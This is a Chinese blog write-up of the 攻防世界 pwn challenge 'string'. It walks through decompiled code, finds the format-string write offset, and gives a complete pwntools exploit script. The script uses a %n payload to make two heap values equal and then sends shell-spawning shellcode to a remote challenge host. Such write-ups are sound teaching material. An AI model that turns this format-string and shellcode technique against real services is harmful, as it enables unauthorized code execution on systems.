攻防世界pwn——string

最新推荐文章于 2023-06-21 13:02:36 发布
最新推荐文章于 2023-06-21 13:02:36 发布
阅读量669 收藏
点赞数 1
分类专栏: PWN 文章标签: 安全 linux 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62076255/article/details/127705467
版权

分析

名字看来是格式化字符串漏洞

checksec

64位,开启了canary,不能直接栈溢出了

IDA

main函数

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  _DWORD *v4; // [rsp+18h] [rbp-78h]

  setbuf(stdout, 0LL);
  alarm(0x3Cu);
  sub_400996(60LL);
  v4 = malloc(8uLL);
  *v4 = 68;
  v4[1] = 85;
  puts("we are wizard, we will give you hand, you can not defeat dragon by yourself ...");
  puts("we will tell you two secret ...");
  printf("secret[0] is %x\n", v4);
  printf("secret[1] is %x\n", v4 + 1);
  puts("do not tell anyone ");
  sub_400D72(v4);
  puts("The End.....Really?");
  return 0LL;
}

这是个小游戏,函数有点多,有目的性的找到在sub_400BB9()中有printf函数

unsigned __int64 sub_400BB9()
{
  int v1; // [rsp+4h] [rbp-7Ch] BYREF
  __int64 v2; // [rsp+8h] [rbp-78h] BYREF
  char format[104]; // [rsp+10h] [rbp-70h] BYREF
  unsigned __int64 v4; // [rsp+78h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  v2 = 0LL;
  puts("You travel a short distance east.That's odd, anyone disappear suddenly");
  puts(", what happend?! You just travel , and find another hole");
  puts("You recall, a big black hole will suckk you into it! Know what should you do?");
  puts("go into there(1), or leave(0)?:");
  _isoc99_scanf("%d", &v1);
  if ( v1 == 1 )
  {
    puts("A voice heard in your mind");
    puts("'Give me an address'");
    _isoc99_scanf("%ld", &v2);
    puts("And, you wish is:");
    _isoc99_scanf("%s", format);
    puts("Your wish is");
    printf(format);
    puts("I hear it, I hear it....");
  }
  return __readfsqword(0x28u) ^ v4;
}

分析一下流程:运行main→输入name后跳转sub_400D72→长度≤0xC就可以先执行sub_400A7D(),后执行sub_400BB9(),最后执行sub_400CA6(a1)

sub_400A7D中没有什么,sub_400BB9中有个printf,sub_400CA6中有个注意点。

unsigned __int64 __fastcall sub_400CA6(_DWORD *a1)
{
  void *v1; // rsi
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("Ahu!!!!!!!!!!!!!!!!A Dragon has appeared!!");
  puts("Dragon say: HaHa! you were supposed to have a normal");
  puts("RPG game, but I have changed it! you have no weapon and ");
  puts("skill! you could not defeat me !");
  puts("That's sound terrible! you meet final boss!but you level is ONE!");
  if ( *a1 == a1[1] )
  {
    puts("Wizard: I will help you! USE YOU SPELL");
    v1 = mmap(0LL, 0x1000uLL, 7, 33, -1, 0LL);
    read(0, v1, 0x100uLL);
    ((void (__fastcall *)(_QWORD))v1)(0LL);
  }
  return __readfsqword(0x28u) ^ v3;
}

if里mma是p一种内存映射文件的方法,通过read函数读入一串机器码,然后运行。也就是if判读a1[0]==a1[1]为真,就将v1的内容当成可执行的。很明显,拿v1来存储shellcode来执行。这里的v1往前翻一翻就知道其实是main里的v4传过去的

main里给了v4[0]=68,v4[1]=85值并不相等,就要得到v4的地址来修改值使得二者相等

exp

该函数里,是先输入存到v1里,但是没有对v1的printf无法利用漏洞,然后有v2和format两个分别存'address'和'wish',利用后面两个任意一个计算偏移

先利用%p的输入确定偏移量为7

aaaaaaaa-%p-%p-%p-%p-%p-%p-%p-%p-%p

第8个是0x6161616161616161,也就是输入的aaaaaaaa。64的调用约定是前 6 个参数是从左至右依次存放于RDI,RSI,RDX,RCX,R8,R9寄存器里面,剩下的参数通过栈传递,从右至左顺序入栈,这里也就是RDI→RSI→RDX→RCX→R8→R9→RSP+8→RSP+16,是RSP+16。

因为这一行printf前面还有'Give me an address'后输入的v2参数,占了一个偏移,所以输入的wish是printf的第八个参数,格式化字符串的第七个参数

这里找偏移还可以在address输入

65535 # 也就是0xffff

 这次就是第七个参数了

下面是将v4[1]的值85赋值到*v4中

from pwn import *
# context(arch='amd64', os='linux', log_level='debug')
p=remote("61.147.171.105 ",52277)
p.recvuntil('secret[0] is ')
#v4_addr=int(sh.recv(7),16)
v4_addr=int(p.recvuntil('\n')[:-1],16) # -1是从右边开始裁,16是转换成16进制

p.sendlineafter('name be:','name')
p.sendlineafter('east or up?:','east')
p.sendlineafter('leave(0)?:','1')
p.sendlineafter('\'Give me an address\'',str(v4_addr)) # 传入v4的地址

payload='a'*85+'%7$n'
# payload='%085d'+'%7$n'
# payload='%85x%7$n'
p.recvuntil('you wish is:')
p.sendline('%85x%7$n')

shellcode=asm(shellcraft.amd64.linux.sh(),arch="amd64")
p.recvuntil('I will help you! USE YOU SPELL')
p.sendline(shellcode)
p.interactive()

如果想v4[0]的值68放到v4[1]中,只要改一点就可以

p.recvuntil('secret[1] is ') # 换成获取v4+1的值
# 或者是和原来一样获取v4的值,但是后面改成p.sendlineafter('\'Give me an address\'',str(v4_addr+4))

%n将它前面的字符长度数赋值给一个变量或一个地址,用%k$n将其前面的字符长度数赋值给偏移该函数为k的参数

Lyrisฅ
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界pwn-string
a_silly_coder的博客
05-18 289
首先检查保护 将文件拖入64位ida 查看代码逻辑,发现这个代码有些复杂,但是大多数都是无效信息,很多输入都是指引程序进行的,扰乱我们的视线。 关键信息有:v3v4的数值地址都给出来了,然后查看sub_400D72函数 这里首先输入一个name,这是干扰输入,只要不超过0xC的长度即可。然后sub_400A7D也是干扰输入,只需要跟着代码输入就可以了。接着查看sub_400BB9与sub_400CA6 sub_400BB9这里很显然是有一个格式化字符串漏洞。 接着看s...
攻防世界Misc高手进阶区
weixin_46938584的博客
12-10 246
something_in_image 下载附件,利用flie命令分析文件为 Linux EXT filesystem,直接 strings badimages |grep -i flag得到flag。 附上strings命令详解:strings
攻防世界 pwn string
N1rvana的博客
11-15 3909
攻防世界string应该是新手区数一数二的难题,难点在理解程序流程。 先观察主函数: alarm函数 什么是alarm函数? 如上图所示,在做一些pwn题的时候,我们有时会遇到alarm(0x3Cu)函数。alarm函数中的参数0x3Cu是十六进制无符号数,即十进制对应60,所以该函数的作用是在程序运行60秒后,给进程发送SIGALRM信号,如果不另编写程序接受处理此信号,则默认结束此程序。 为什么要使用alarm函数? 一是比赛中常要远程连接服务器解题,官方不希望有队伍长时间解不出来题浪费服务器资源 二
攻防世界新手区—string
hanabi_sh
10-15 510
攻防世界string,格式化字符漏洞
[攻防世界]string
逆向萌新的博客
06-20 162
[攻防世界]string详解
攻防世界 welpwn
10-07 291
1.题目 2.IDA分析 3.流程分析 流程很简单,输入buf,这里不存在溢出,然后进入echo方法,将buf复制到s2,当遇到\x00就结束。这个条件会导致p64(addr)后面的内容被截断(地址经p64包装后肯定会出现\0x00)。栈结构如下: 也就是说,s2只能复制buf前面32个单元的内容。为了使32位后面的内容得以执行,我们需要在ret位置跳去执行四个pop指令,去掉buf前32位内容(也就是复制到s2里面的这些内容),这样就能连贯执行32位之后的内容了。 所以,..
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
awd攻防比赛总结——3s_NwGeek.docx
09-30
首先,作者介绍了比赛的规则和环境,包括多个环境、Web 和 Pwn 等。然后,作者分享了自己的战略和技巧,其中包括挖洞、补洞、溯源分析和可持续访问等。 在比赛中,作者遇到了很多的问题,例如服务器Environment会...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
CTFshow-pwn入门-前置基础pwn32-pwn34
最新发布
T1ngSh0w的博客
06-21 658
CTFshow-pwn入门-前置基础pwn32-pwn34
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 5792
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串函
c语言格式化字符漏洞,[原创]Pwn学习笔记:printf格式化字符串漏洞原理与利用
weixin_39736379的博客
05-22 719
基本介绍Format String 介绍在C语言中,我们常用的输出函数有printf、 fprintf、 vprintf、 vfprintf、 sprint等。对于这些输出函数,Format String是其第一个参数,我们一般称之为格式化字符串。下面简单介绍格式化字符串如何在输出函数进行解析。printf 接受变长的参数,其中第一个参数为格式化字符串,后面的参数在实际运行时将与格式化字符串中特定...
攻防世界STRing
WangLal的博客
07-06 303
攻防世界PWN String的WP 基本的三步checksec,file,执行文件 这是一个64位文件,只有pIE没开。 由string这个题目猜测可能会是字符串漏洞 将下载好的附件扔进IDA里查看,点击main函数 main函数中找不到,那就在其他函数看一下。 点击 sub_400D72 要进入if条件中,输入的s的长度需小于12位 在sub_400BB9函数中看到了 printf前几句中存在%s与%ld,可以操作. 继续看下一个函数 (a1+4是指a1加4个字节,也就是一个整数类型所以这个就是a
攻防世界String Writeup
只影的博客
03-04 2286
这道题暂且认为是攻防世界pwn新手区比较难的一道题,而难点主要在于读懂题目,读懂后就比较简单了。 查看程序的防御机制,发现除了PIE全开。从题目string可猜测,应该是个格式化字符串的漏洞。可以在Linux中先将程序跑一遍,对程序的流程和分支有个大概了解,本题是个简单的D&D类型的游戏题目。 用ida对程序进行分析,顺着程序的流程走,可以看到在sub_400BB9中有printf(&am...
[GreyCTF‘23] pwn部分
weixin_52640415的博客
05-22 545
负数绕过, 栈残留, risc-v pwn
pwn string
weixin_45677731的博客
03-13 607
题目来源:攻防世界 拿到题目后checksec 可以看到是64位的,拖到ida里看一下 有个v3=malloc(8ull) 这个函数查了一会儿,分配内存的,最后的结果就是v3前面放了68,后面放了85 点进sub_400d72这个函数看一下 可以看到这里有三个主要的函数,我们逐个分析 第一个 ...
[攻防世界 pwn]——string(内涵peak小知识)
Y_peak的博客
02-19 431
[攻防世界 pwn]——string 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 mmap函数作用,mmap主要是将文件映射到一段内存去同时设置那段内存的属性可读可写或者是可执行详情请看mmap & mprotect 在checksec看到开启了canary和NX,应该和格式化字符串有关。 在IDA中看看,发现侧边栏竟然有mmap函数,这个地方应该是关键点, 找到函数位置,想要保证该函数执行,必须保证前两个函数执行完毕,并且a1 == a1[
攻防世界pwn类题中string
05-11
攻防世界Pwn类题目中,`string`通常是指一个用于存储字符串的字符数组或指针,是一个C语言中常见的数据类型。在Pwn类题目中,`string`往往是一个非常重要的数据结构,因为大多数漏洞都与字符串的处理有关。例如,`strcpy`和`strcat`等字符串处理函数容易导致缓冲区溢出漏洞,而使用`printf`函数时,如果格式字符串中包含了`%s`等字符串格式化符号,也容易导致格式化字符串漏洞。因此,在Pwn类题目中,正确地处理字符串是非常重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值